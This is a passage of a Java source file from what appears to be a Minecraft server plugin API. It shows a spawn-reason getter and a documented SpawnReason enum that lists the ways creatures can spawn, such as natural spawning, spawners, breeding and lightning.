        return (LivingEntity) entity;
    }

    /**
     * Gets the reason for why the creature is being spawned.
     *
     * @return A SpawnReason value detailing the reason for the creature being
     *     spawned
     */
    public SpawnReason getSpawnReason() {
        return spawnReason;
    }

    /**
     * An enum to specify the type of spawning
     */
    public enum SpawnReason {

        /**
         * When something spawns from natural means
         */
        NATURAL,
        /**
         * When an entity spawns as a jockey of another entity (mostly spider
         * jockeys)
         */
        JOCKEY,
        /**
         * When a creature spawns due to chunk generation
         */
        CHUNK_GEN,
        /**
         * When a creature spawns from a spawner
         */
        SPAWNER,
        /**
         * When a creature spawns from an egg
         */
        EGG,
        /**
         * When a creature spawns from a Spawner Egg
         */
        SPAWNER_EGG,
        /**
         * When a creature spawns because of a lightning strike
         */
        LIGHTNING,
        /**
         * When a snowman is spawned by being built
         */
        BUILD_SNOWMAN,
        /**
         * When an iron golem is spawned by being built
         */
        BUILD_IRONGOLEM,
        /**
         * When a wither boss is spawned by being built
         */
        BUILD_WITHER,
        /**
         * When an iron golem is spawned to defend a village
         */
        VILLAGE_DEFENSE,
        /**
         * When a zombie is spawned to invade a village
         */
        VILLAGE_INVASION,
        /**
         * When an animal breeds to create a child
         */
        BREEDING,
        /**
         * When a slime splits
         */
        SLIME_SPLIT,
        /**
         * When an entity calls for reinforcements
         */
        REINFORCEMENTS,
        /**
         * When a creature is spawned by nether portal
         */
        NETHER_PORTAL,
        /**
         * When a creature is spawned by a dispenser dispensing an egg
         */
        DISPENSE_EGG,
        /**
         * When a zombie infects a villager
         */
        INFECTION,
        /**
         * When a villager is cured from infection
         */
        CURED,
        /**
         * When an ocelot has a baby spawned along with them
         */
        OCELOT_BABY,
        /**
         * When a silverfish spawns from a block
         */
        SILVERFISH_BLOCK,
        /**
         * When an entity spawns as a mount of another entity (mostly chicken
         * jockeys)
         */
        MOUNT,
        /**
         * When an entity spawns as a trap for players approaching
         */
        TRAP,
        /**
         * When an entity is spawned as a result of ender pearl usage
         */
        ENDER_PEARL,
        /**
         * When an entity is spawned as a result of the entity it is being
         * perched on jumping or being damaged
         */
        SHOULDER_ENTITY,
        /**
         * When a creature is spawned by plugins
         */
        CUSTOM,
        /**
         * When an entity is missing a SpawnReason
         */
        DEFAULT
    }
}
{ "pile_set_name": "Github" }